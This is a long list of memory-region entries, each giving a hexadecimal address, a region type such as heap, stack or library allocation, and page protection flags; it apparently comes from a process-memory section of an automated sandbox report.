|
||
|
116945F4000
|
heap
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
35A7000
|
trusted library allocation
|
page read and write
|
||
|
158A8F8A000
|
trusted library allocation
|
page read and write
|
||
|
158A73D0000
|
heap
|
page execute and read and write
|
||
|
6978000
|
trusted library allocation
|
page read and write
|
||
|
4094000
|
trusted library allocation
|
page read and write
|
||
|
158A8CB0000
|
trusted library allocation
|
page read and write
|
||
|
1FD20640000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
71DB7E000
|
stack
|
page read and write
|
||
|
1FD20620000
|
heap
|
page read and write
|
||
|
7F1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3236000
|
trusted library allocation
|
page read and write
|
||
|
3244000
|
trusted library allocation
|
page read and write
|
||
|
158A7120000
|
trusted library allocation
|
page read and write
|
||
|
FA418D000
|
stack
|
page read and write
|
||
|
54A4000
|
trusted library allocation
|
page read and write
|
||
|
69F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
158A8D06000
|
trusted library allocation
|
page read and write
|
||
|
78A0000
|
heap
|
page read and write
|
||
|
6F90000
|
trusted library allocation
|
page read and write
|
||
|
1488000
|
heap
|
page read and write
|
||
|
116945D0000
|
heap
|
page read and write
|
||
|
FFA60FE000
|
stack
|
page read and write
|
||
|
25F6EC80000
|
heap
|
page read and write
|
||
|
1410000
|
trusted library allocation
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
1FD20722000
|
heap
|
page read and write
|
||
|
34DD000
|
trusted library allocation
|
page read and write
|
||
|
1FD20791000
|
heap
|
page read and write
|
||
|
1FD2070A000
|
heap
|
page read and write
|
||
|
32AD000
|
trusted library allocation
|
page read and write
|
||
|
6CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
5954000
|
heap
|
page read and write
|
||
|
1430000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
407C000
|
trusted library allocation
|
page read and write
|
||
|
116A7F52000
|
trusted library allocation
|
page read and write
|
||
|
158A7150000
|
heap
|
page readonly
|
||
|
116948D0000
|
trusted library allocation
|
page read and write
|
||
|
55E0000
|
heap
|
page read and write
|
||
|
54D2000
|
trusted library allocation
|
page read and write
|
||
|
158A8EDA000
|
trusted library allocation
|
page read and write
|
||
|
1169464B000
|
heap
|
page read and write
|
||
|
1169AE3C000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
25F6CE68000
|
heap
|
page read and write
|
||
|
158A912F000
|
trusted library allocation
|
page read and write
|
||
|
1FD20728000
|
heap
|
page read and write
|
||
|
FA373C000
|
stack
|
page read and write
|
||
|
6AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3FCF000
|
trusted library allocation
|
page read and write
|
||
|
405C000
|
trusted library allocation
|
page read and write
|
||
|
158C11A4000
|
heap
|
page read and write
|
||
|
158A71D4000
|
heap
|
page read and write
|
||
|
116A627A000
|
trusted library allocation
|
page read and write
|
||
|
33B2000
|
trusted library allocation
|
page read and write
|
||
|
6AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1169B8C7000
|
trusted library allocation
|
page read and write
|
||
|
158A7140000
|
trusted library allocation
|
page read and write
|
||
|
25F6CE81000
|
heap
|
page read and write
|
||
|
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
|
1484000
|
heap
|
page read and write
|
||
|
1FD2094E000
|
heap
|
page read and write
|
||
|
7A95000
|
trusted library allocation
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
FFA5D6B000
|
stack
|
page read and write
|
||
|
2E2E000
|
stack
|
page read and write
|
||
|
6970000
|
trusted library allocation
|
page read and write
|
||
|
356D000
|
trusted library allocation
|
page read and write
|
||
|
6C70000
|
trusted library allocation
|
page read and write
|
||
|
7DF4D9B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA307E000
|
stack
|
page read and write
|
||
|
6C50000
|
trusted library allocation
|
page read and write
|
||
|
11694490000
|
heap
|
page read and write
|
||
|
1169A121000
|
trusted library allocation
|
page read and write
|
||
|
6985000
|
trusted library allocation
|
page read and write
|
||
|
1FD223D0000
|
heap
|
page read and write
|
||
|
1FD2094C000
|
heap
|
page read and write
|
||
|
158C12B0000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
158C10A7000
|
heap
|
page execute and read and write
|
||
|
54E0000
|
trusted library allocation
|
page read and write
|
||
|
4FC8000
|
trusted library allocation
|
page read and write
|
||
|
4044000
|
trusted library allocation
|
page read and write
|
||
|
116A7FAA000
|
trusted library allocation
|
page read and write
|
||
|
1FD20763000
|
heap
|
page read and write
|
||
|
71E1FE000
|
stack
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
4148000
|
trusted library allocation
|
page read and write
|
||
|
116A76CB000
|
trusted library allocation
|
page read and write
|
||
|
793E000
|
heap
|
page read and write
|
||
|
32C7000
|
trusted library allocation
|
page read and write
|
||
|
11699E7F000
|
trusted library allocation
|
page read and write
|
||
|
78AB000
|
heap
|
page read and write
|
||
|
21BA2FF000
|
stack
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
55F0000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
140A000
|
trusted library allocation
|
page execute and read and write
|
||
|
62FE000
|
stack
|
page read and write
|
||
|
116A7EEA000
|
trusted library allocation
|
page read and write
|
||
|
13DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7AC000
|
trusted library allocation
|
page read and write
|
||
|
1FD20754000
|
heap
|
page read and write
|
||
|
311A000
|
trusted library allocation
|
page read and write
|
||
|
1169B73B000
|
trusted library allocation
|
page read and write
|
||
|
158C11D0000
|
heap
|
page read and write
|
||
|
6B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
116946EC000
|
heap
|
page read and write
|
||
|
21BA4FE000
|
stack
|
page read and write
|
||
|
FA333F000
|
stack
|
page read and write
|
||
|
1169A7DF000
|
trusted library allocation
|
page read and write
|
||
|
1FD20727000
|
heap
|
page read and write
|
||
|
6989000
|
trusted library allocation
|
page read and write
|
||
|
315A000
|
trusted library allocation
|
page read and write
|
||
|
1FD21F90000
|
heap
|
page read and write
|
||
|
1537000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
11698C1F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
116963C1000
|
trusted library allocation
|
page read and write
|
||
|
354A000
|
trusted library allocation
|
page read and write
|
||
|
1FD20726000
|
heap
|
page read and write
|
||
|
30FA000
|
trusted library allocation
|
page read and write
|
||
|
7919000
|
heap
|
page read and write
|
||
|
25F6CEAD000
|
heap
|
page read and write
|
||
|
348A000
|
trusted library allocation
|
page read and write
|
||
|
25F6EB80000
|
heap
|
page read and write
|
||
|
25F6CE81000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
11699F8B000
|
trusted library allocation
|
page read and write
|
||
|
158A90A6000
|
trusted library allocation
|
page read and write
|
||
|
1FD20732000
|
heap
|
page read and write
|
||
|
1FD2071A000
|
heap
|
page read and write
|
||
|
158A7185000
|
heap
|
page read and write
|
||
|
7FF7D6FDC000
|
unkown
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
158C1187000
|
heap
|
page read and write
|
||
|
588C000
|
heap
|
page read and write
|
||
|
158C15C0000
|
heap
|
page read and write
|
||
|
78D9000
|
heap
|
page read and write
|
||
|
1FD20727000
|
heap
|
page read and write
|
||
|
5967000
|
heap
|
page read and write
|
||
|
4124000
|
trusted library allocation
|
page read and write
|
||
|
1FD20727000
|
heap
|
page read and write
|
||
|
158C10B0000
|
heap
|
page read and write
|
||
|
3FE9000
|
trusted library allocation
|
page read and write
|
||
|
4120000
|
trusted library allocation
|
page read and write
|
||
|
1169B6FF000
|
trusted library allocation
|
page read and write
|
||
|
125E000
|
stack
|
page read and write
|
||
|
13F5000
|
heap
|
page read and write
|
||
|
1FD20948000
|
heap
|
page read and write
|
||
|
158A8FC2000
|
trusted library allocation
|
page read and write
|
||
|
FA31FE000
|
stack
|
page read and write
|
||
|
1400000
|
trusted library allocation
|
page read and write
|
||
|
40BF000
|
trusted library allocation
|
page read and write
|
||
|
158A7300000
|
heap
|
page read and write
|
||
|
6CFC000
|
stack
|
page read and write
|
||
|
158A8F9C000
|
trusted library allocation
|
page read and write
|
||
|
3531000
|
trusted library allocation
|
page read and write
|
||
|
116963F7000
|
trusted library allocation
|
page read and write
|
||
|
1FD20722000
|
heap
|
page read and write
|
||
|
69DE000
|
trusted library allocation
|
page read and write
|
||
|
21B9EFE000
|
stack
|
page read and write
|
||
|
1FD206F7000
|
heap
|
page read and write
|
||
|
7AB5000
|
trusted library allocation
|
page read and write
|
||
|
4075000
|
trusted library allocation
|
page read and write
|
||
|
7709000
|
trusted library allocation
|
page read and write
|
||
|
7B6F000
|
stack
|
page read and write
|
||
|
116963FB000
|
trusted library allocation
|
page read and write
|
||
|
71E27B000
|
stack
|
page read and write
|
||
|
7FF7D6FDE000
|
unkown
|
page readonly
|
||
|
78F2000
|
heap
|
page read and write
|
||
|
116A62CB000
|
trusted library allocation
|
page read and write
|
||
|
25F6CEBB000
|
heap
|
page read and write
|
||
|
1FD20754000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
33D3000
|
trusted library allocation
|
page read and write
|
||
|
116A7E02000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
34E5000
|
trusted library allocation
|
page read and write
|
||
|
158A8CC4000
|
trusted library allocation
|
page read and write
|
||
|
30F2000
|
trusted library allocation
|
page read and write
|
||
|
116A5FF3000
|
trusted library allocation
|
page read and write
|
||
|
116A7E44000
|
trusted library allocation
|
page read and write
|
||
|
1FD223D3000
|
heap
|
page read and write
|
||
|
3540000
|
trusted library allocation
|
page read and write
|
||
|
5ABE000
|
stack
|
page read and write
|
||
|
416D000
|
trusted library allocation
|
page read and write
|
||
|
1FD223DE000
|
heap
|
page read and write
|
||
|
FA343A000
|
stack
|
page read and write
|
||
|
7936000
|
heap
|
page read and write
|
||
|
116A62C2000
|
trusted library allocation
|
page read and write
|
||
|
1FD223FC000
|
heap
|
page read and write
|
||
|
116963CF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
80AE000
|
stack
|
page read and write
|
||
|
69BB000
|
trusted library allocation
|
page read and write
|
||
|
1169468B000
|
heap
|
page read and write
|
||
|
158C10FC000
|
heap
|
page read and write
|
||
|
412F000
|
trusted library allocation
|
page read and write
|
||
|
116963C7000
|
trusted library allocation
|
page read and write
|
||
|
21BA5FE000
|
stack
|
page read and write
|
||
|
14C9000
|
heap
|
page read and write
|
||
|
316D000
|
trusted library allocation
|
page read and write
|
||
|
1169463D000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
341A000
|
trusted library allocation
|
page read and write
|
||
|
41AE000
|
trusted library allocation
|
page read and write
|
||
|
116A6042000
|
trusted library allocation
|
page read and write
|
||
|
54C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
3FF0000
|
trusted library allocation
|
page read and write
|
||
|
25F6CEC3000
|
heap
|
page read and write
|
||
|
62BE000
|
stack
|
page read and write
|
||
|
58C2000
|
heap
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
1169781F000
|
trusted library allocation
|
page read and write
|
||
|
158A8BE2000
|
trusted library allocation
|
page read and write
|
||
|
1FD223E6000
|
heap
|
page read and write
|
||
|
3578000
|
trusted library allocation
|
page read and write
|
||
|
116A7F2A000
|
trusted library allocation
|
page read and write
|
||
|
6B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
FA410E000
|
stack
|
page read and write
|
||
|
34FE000
|
trusted library allocation
|
page read and write
|
||
|
1FD20786000
|
heap
|
page read and write
|
||
|
7AAF000
|
trusted library allocation
|
page read and write
|
||
|
35B1000
|
trusted library allocation
|
page read and write
|
||
|
7A92000
|
trusted library allocation
|
page read and write
|
||
|
31AE000
|
trusted library allocation
|
page read and write
|
||
|
14F6000
|
heap
|
page read and write
|
||
|
13ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
40DE000
|
trusted library allocation
|
page read and write
|
||
|
6C60000
|
heap
|
page execute and read and write
|
||
|
3412000
|
trusted library allocation
|
page read and write
|
||
|
7FF7D6FD0000
|
unkown
|
page readonly
|
||
|
7FF7D6FDE000
|
unkown
|
page readonly
|
||
|
71DDFF000
|
stack
|
page read and write
|
||
|
71DE7E000
|
stack
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
353C000
|
trusted library allocation
|
page read and write
|
||
|
25F6D07A000
|
heap
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
158A70E0000
|
heap
|
page read and write
|
||
|
4155000
|
trusted library allocation
|
page read and write
|
||
|
116A6295000
|
trusted library allocation
|
page read and write
|
||
|
6A10000
|
trusted library allocation
|
page read and write
|
||
|
FA35BE000
|
stack
|
page read and write
|
||
|
1FD2072E000
|
heap
|
page read and write
|
||
|
1FD2094D000
|
heap
|
page read and write
|
||
|
4167000
|
trusted library allocation
|
page read and write
|
||
|
1402000
|
trusted library allocation
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
6880000
|
trusted library allocation
|
page execute and read and write
|
||
|
4086000
|
trusted library allocation
|
page read and write
|
||
|
1169ADBA000
|
trusted library allocation
|
page read and write
|
||
|
31D2000
|
trusted library allocation
|
page read and write
|
||
|
3556000
|
trusted library allocation
|
page read and write
|
||
|
1169BBE2000
|
trusted library allocation
|
page read and write
|
||
|
5971000
|
heap
|
page read and write
|
||
|
7FAE000
|
stack
|
page read and write
|
||
|
1FD20754000
|
heap
|
page read and write
|
||
|
791D000
|
heap
|
page read and write
|
||
|
13BE000
|
stack
|
page read and write
|
||
|
4107000
|
trusted library allocation
|
page read and write
|
||
|
158A8BE7000
|
trusted library allocation
|
page read and write
|
||
|
25F6CE40000
|
heap
|
page read and write
|
||
|
31BE000
|
trusted library allocation
|
page read and write
|
||
|
4101000
|
trusted library allocation
|
page read and write
|
||
|
11695FD1000
|
trusted library allocation
|
page read and write
|
||
|
67FE000
|
stack
|
page read and write
|
||
|
4054000
|
trusted library allocation
|
page read and write
|
||
|
4003000
|
trusted library allocation
|
page read and write
|
||
|
25F6CEAE000
|
heap
|
page read and write
|
||
|
7964000
|
heap
|
page read and write
|
||
|
33C8000
|
trusted library allocation
|
page read and write
|
||
|
158A71FC000
|
heap
|
page read and write
|
||
|
5500000
|
trusted library allocation
|
page read and write
|
||
|
158A71BA000
|
heap
|
page read and write
|
||
|
158A71B4000
|
heap
|
page read and write
|
||
|
68A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
158C10A0000
|
heap
|
page execute and read and write
|
||
|
340F000
|
trusted library allocation
|
page read and write
|
||
|
116961F8000
|
trusted library allocation
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
583E000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD2073F000
|
heap
|
page read and write
|
||
|
25F6CE20000
|
heap
|
page read and write
|
||
|
21BA7FB000
|
stack
|
page read and write
|
||
|
1169641F000
|
trusted library allocation
|
page read and write
|
||
|
25F6D075000
|
heap
|
page read and write
|
||
|
25F6EB83000
|
heap
|
page read and write
|
||
|
30E0000
|
trusted library allocation
|
page read and write
|
||
|
317B000
|
trusted library allocation
|
page read and write
|
||
|
40C5000
|
trusted library allocation
|
page read and write
|
||
|
158A8BFC000
|
trusted library allocation
|
page read and write
|
||
|
158A71B6000
|
heap
|
page read and write
|
||
|
1417000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
25F6CE8D000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
25F6CEB2000
|
heap
|
page read and write
|
||
|
1169ADE3000
|
trusted library allocation
|
page read and write
|
||
|
6987000
|
trusted library allocation
|
page read and write
|
||
|
6A40000
|
trusted library allocation
|
page read and write
|
||
|
515C000
|
stack
|
page read and write
|
||
|
11694645000
|
heap
|
page read and write
|
||
|
35D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
3542000
|
trusted library allocation
|
page read and write
|
||
|
3474000
|
trusted library allocation
|
page read and write
|
||
|
4119000
|
trusted library allocation
|
page read and write
|
||
|
1169821F000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
1FD223D1000
|
heap
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
158A8BAD000
|
trusted library allocation
|
page read and write
|
||
|
5580000
|
trusted library allocation
|
page read and write
|
||
|
158A717C000
|
heap
|
page read and write
|
||
|
340C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
413C000
|
trusted library allocation
|
page read and write
|
||
|
FA2DEE000
|
stack
|
page read and write
|
||
|
446000
|
remote allocation
|
page execute and read and write
|
||
|
597E000
|
heap
|
page read and write
|
||
|
78C3000
|
heap
|
page read and write
|
||
|
31C6000
|
trusted library allocation
|
page read and write
|
||
|
6A05000
|
trusted library allocation
|
page read and write
|
||
|
5A7E000
|
stack
|
page read and write
|
||
|
34CB000
|
trusted library allocation
|
page read and write
|
||
|
3FF5000
|
trusted library allocation
|
page read and write
|
||
|
34A0000
|
trusted library allocation
|
page read and write
|
||
|
1260000
|
heap
|
page read and write
|
||
|
3182000
|
trusted library allocation
|
page read and write
|
||
|
3FFF000
|
trusted library allocation
|
page read and write
|
||
|
408C000
|
trusted library allocation
|
page read and write
|
||
|
11696E1F000
|
trusted library allocation
|
page read and write
|
||
|
1FD20722000
|
heap
|
page read and write
|
||
|
1FD20948000
|
heap
|
page read and write
|
||
|
158A90E1000
|
trusted library allocation
|
page read and write
|
||
|
158C1040000
|
heap
|
page execute and read and write
|
||
|
78E1000
|
heap
|
page read and write
|
||
|
40CC000
|
trusted library allocation
|
page read and write
|
||
|
1FD20780000
|
heap
|
page read and write
|
||
|
347F000
|
trusted library allocation
|
page read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
1FD20702000
|
heap
|
page read and write
|
||
|
158B8C02000
|
trusted library allocation
|
page read and write
|
||
|
34CD000
|
trusted library allocation
|
page read and write
|
||
|
31E7000
|
trusted library allocation
|
page read and write
|
||
|
11694590000
|
heap
|
page read and write
|
||
|
7B2D000
|
stack
|
page read and write
|
||
|
158A7201000
|
heap
|
page read and write
|
||
|
158A9236000
|
trusted library allocation
|
page read and write
|
||
|
6A80000
|
trusted library allocation
|
page read and write
|
||
|
FA428B000
|
stack
|
page read and write
|
||
|
7ABA000
|
trusted library allocation
|
page read and write
|
||
|
54C6000
|
trusted library allocation
|
page read and write
|
||
|
116945F0000
|
heap
|
page read and write
|
||
|
5590000
|
trusted library allocation
|
page execute and read and write
|
||
|
324B000
|
trusted library allocation
|
page read and write
|
||
|
71E0FE000
|
stack
|
page read and write
|
||
|
5850000
|
trusted library allocation
|
page read and write
|
||
|
1FD206B0000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
FA34BB000
|
stack
|
page read and write
|
||
|
150B000
|
heap
|
page read and write
|
||
|
116963D3000
|
trusted library allocation
|
page read and write
|
||
|
21BA6FE000
|
stack
|
page read and write
|
||
|
5570000
|
heap
|
page read and write
|
||
|
FA363E000
|
stack
|
page read and write
|
||
|
158A7165000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1FD20948000
|
heap
|
page read and write
|
||
|
FA30FA000
|
stack
|
page read and write
|
||
|
78BF000
|
heap
|
page read and write
|
||
|
1FD20754000
|
heap
|
page read and write
|
||
|
158A8F65000
|
trusted library allocation
|
page read and write
|
||
|
158A6FA0000
|
heap
|
page read and write
|
||
|
58DA000
|
heap
|
page read and write
|
||
|
FA317E000
|
stack
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
3433000
|
trusted library allocation
|
page read and write
|
||
|
7BEE000
|
stack
|
page read and write
|
||
|
158A9240000
|
trusted library allocation
|
page read and write
|
||
|
1FD20721000
|
heap
|
page read and write
|
||
|
25F6CE85000
|
heap
|
page read and write
|
||
|
3467000
|
trusted library allocation
|
page read and write
|
||
|
FA32F9000
|
stack
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
33D0000
|
trusted library allocation
|
page read and write
|
||
|
40E8000
|
trusted library allocation
|
page read and write
|
||
|
116A62AD000
|
trusted library allocation
|
page read and write
|
||
|
6A0B000
|
trusted library allocation
|
page read and write
|
||
|
31B8000
|
trusted library allocation
|
page read and write
|
||
|
1415000
|
trusted library allocation
|
page execute and read and write
|
||
|
1169AC67000
|
trusted library allocation
|
page read and write
|
||
|
78A8000
|
heap
|
page read and write
|
||
|
158B8B91000
|
trusted library allocation
|
page read and write
|
||
|
116A7F10000
|
trusted library allocation
|
page read and write
|
||
|
6C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
71DD7F000
|
stack
|
page read and write
|
||
|
60D2000
|
heap
|
page read and write
|
||
|
5880000
|
heap
|
page read and write
|
||
|
158A7170000
|
heap
|
page read and write
|
||
|
158B8BA0000
|
trusted library allocation
|
page read and write
|
||
|
6F7E000
|
stack
|
page read and write
|
||
|
7790000
|
heap
|
page read and write
|
||
|
1FD2073E000
|
heap
|
page read and write
|
||
|
1169ACFC000
|
trusted library allocation
|
page read and write
|
||
|
158A8F73000
|
trusted library allocation
|
page read and write
|
||
|
158A7080000
|
heap
|
page read and write
|
||
|
6A90000
|
trusted library allocation
|
page read and write
|
||
|
25F71062000
|
heap
|
page read and write
|
||
|
1FD2073F000
|
heap
|
page read and write
|
||
|
4174000
|
trusted library allocation
|
page read and write
|
||
|
4186000
|
trusted library allocation
|
page read and write
|
||
|
76F6000
|
trusted library allocation
|
page read and write
|
||
|
1169A611000
|
trusted library allocation
|
page read and write
|
||
|
13D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FD223DB000
|
heap
|
page read and write
|
||
|
25F6CE8D000
|
heap
|
page read and write
|
||
|
1169A60F000
|
trusted library allocation
|
page read and write
|
||
|
1FD20737000
|
heap
|
page read and write
|
||
|
40D0000
|
trusted library allocation
|
page read and write
|
||
|
71DA73000
|
stack
|
page read and write
|
||
|
25F6CEB2000
|
heap
|
page read and write
|
||
|
343B000
|
trusted library allocation
|
page read and write
|
||
|
1169A162000
|
trusted library allocation
|
page read and write
|
||
|
116A7DBB000
|
trusted library allocation
|
page read and write
|
||
|
1FD223D6000
|
heap
|
page read and write
|
||
|
7FF7D6FD1000
|
unkown
|
page execute read
|
||
|
328A000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
158C10B4000
|
heap
|
page read and write
|
||
|
158A8CC1000
|
trusted library allocation
|
page read and write
|
||
|
11695FC0000
|
heap
|
page execute and read and write
|
||
|
3154000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
|
1169AA9A000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
33DF000
|
trusted library allocation
|
page read and write
|
||
|
40DA000
|
trusted library allocation
|
page read and write
|
||
|
34D7000
|
trusted library allocation
|
page read and write
|
||
|
790D000
|
heap
|
page read and write
|
||
|
1FD206D8000
|
heap
|
page read and write
|
||
|
54F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7D6FD1000
|
unkown
|
page execute read
|
||
|
1FD2071A000
|
heap
|
page read and write
|
||
|
158A8CC7000
|
trusted library allocation
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
4FC0000
|
trusted library allocation
|
page read and write
|
||
|
40A0000
|
trusted library allocation
|
page read and write
|
||
|
76F3000
|
trusted library allocation
|
page read and write
|
||
|
4160000
|
trusted library allocation
|
page read and write
|
||
|
158A8B91000
|
trusted library allocation
|
page read and write
|
||
|
FA327E000
|
stack
|
page read and write
|
||
|
154C000
|
heap
|
page read and write
|
||
|
FFA5DEE000
|
stack
|
page read and write
|
||
|
7895000
|
heap
|
page read and write
|
||
|
1169AE15000
|
trusted library allocation
|
page read and write
|
||
|
3FE2000
|
trusted library allocation
|
page read and write
|
||
|
14F2000
|
heap
|
page read and write
|
||
|
25F6EDA0000
|
trusted library allocation
|
page read and write
|
||
|
54E8000
|
trusted library allocation
|
page read and write
|
||
|
1FD2071A000
|
heap
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
1169AD73000
|
trusted library allocation
|
page read and write
|
||
|
1493000
|
heap
|
page read and write
|
||
|
40B8000
|
trusted library allocation
|
page read and write
|
||
|
25F6CEB0000
|
heap
|
page read and write
|
||
|
6A30000
|
trusted library allocation
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
158A8D00000
|
trusted library allocation
|
page read and write
|
||
|
30EF000
|
trusted library allocation
|
page read and write
|
||
|
30EC000
|
trusted library allocation
|
page read and write
|
||
|
4113000
|
trusted library allocation
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
34DA000
|
trusted library allocation
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
116A8144000
|
trusted library allocation
|
page read and write
|
||
|
FA2CE3000
|
stack
|
page read and write
|
||
|
25F6CEC3000
|
heap
|
page read and write
|
||
|
FA420B000
|
stack
|
page read and write
|
||
|
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7907000
|
heap
|
page read and write
|
||
|
158C1194000
|
heap
|
page read and write
|
||
|
78D2000
|
heap
|
page read and write
|
||
|
11695F50000
|
heap
|
page read and write
|
||
|
3400000
|
trusted library allocation
|
page read and write
|
||
|
1FD2079C000
|
heap
|
page read and write
|
||
|
1169465F000
|
heap
|
page read and write
|
||
|
1FD223EA000
|
heap
|
page read and write
|
||
|
158C1180000
|
heap
|
page read and write
|
||
|
31BB000
|
trusted library allocation
|
page read and write
|
||
|
34F0000
|
trusted library allocation
|
page read and write
|
||
|
408A000
|
trusted library allocation
|
page read and write
|
||
|
116A808F000
|
trusted library allocation
|
page read and write
|
||
|
1FD2072E000
|
heap
|
page read and write
|
||
|
116A7E1C000
|
trusted library allocation
|
page read and write
|
||
|
3FFC000
|
trusted library allocation
|
page read and write
|
||
|
158A8FD4000
|
trusted library allocation
|
page read and write
|
||
|
1FD2073F000
|
heap
|
page read and write
|
||
|
6975000
|
trusted library allocation
|
page read and write
|
||
|
158A726B000
|
heap
|
page read and write
|
||
|
1169A149000
|
trusted library allocation
|
page read and write
|
||
|
592A000
|
heap
|
page read and write
|
||
|
3157000
|
trusted library allocation
|
page read and write
|
||
|
25F6CEC3000
|
heap
|
page read and write
|
||
|
1FD2073A000
|
heap
|
page read and write
|
||
|
6E3E000
|
stack
|
page read and write
|
||
|
7ABF000
|
trusted library allocation
|
page read and write
|
||
|
158A7208000
|
heap
|
page read and write
|
||
|
1169947F000
|
trusted library allocation
|
page read and write
|
||
|
116A6CCB000
|
trusted library allocation
|
page read and write
|
||
|
158C10FA000
|
heap
|
page read and write
|
||
|
1FD20540000
|
heap
|
page read and write
|
||
|
4068000
|
trusted library allocation
|
page read and write
|
||
|
1FD2071A000
|
heap
|
page read and write
|
||
|
11699F01000
|
trusted library allocation
|
page read and write
|
||
|
6C80000
|
trusted library allocation
|
page read and write
|
||
|
321D000
|
trusted library allocation
|
page read and write
|
||
|
3471000
|
trusted library allocation
|
page read and write
|
||
|
404E000
|
trusted library allocation
|
page read and write
|
||
|
79B5000
|
heap
|
page read and write
|
||
|
1FD20940000
|
heap
|
page read and write
|
||
|
5582000
|
trusted library allocation
|
page read and write
|
||
|
76EC000
|
stack
|
page read and write
|
||
|
145B000
|
heap
|
page read and write
|
||
|
6C30000
|
trusted library allocation
|
page read and write
|
||
|
1FD2094E000
|
heap
|
page read and write
|
||
|
1169ADC7000
|
trusted library allocation
|
page read and write
|
||
|
6A50000
|
trusted library allocation
|
page read and write
|
||
|
1169463F000
|
heap
|
page read and write
|
||
|
7AAA000
|
trusted library allocation
|
page read and write
|
||
|
FFA607E000
|
stack
|
page read and write
|
||
|
7890000
|
heap
|
page read and write
|
||
|
25F6CE88000
|
heap
|
page read and write
|
||
|
25F6CE60000
|
heap
|
page read and write
|
||
|
11694643000
|
heap
|
page read and write
|
||
|
7BAE000
|
